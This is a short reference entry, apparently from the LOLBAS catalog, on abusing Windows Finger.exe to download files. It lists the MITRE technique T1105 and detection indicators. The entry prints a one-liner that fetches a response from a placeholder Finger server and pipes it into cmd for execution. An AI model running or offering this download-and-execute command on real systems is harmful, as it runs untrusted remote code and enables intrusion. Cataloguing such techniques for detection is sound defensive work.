Catalog LOLBAS

LOL · Binary

Finger.exe

1 technique WindowsLOLBAS GPL-3.0

Download

File Download Windows

Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.

Use Download malicious payload

finger user@example.host.com | more +2 | cmd
Context
user
Native
Download
MITRE
T1105
Detection
IOC: finger.exe should not be run on a normal workstation.
IOC: finger.exe connecting to external resources.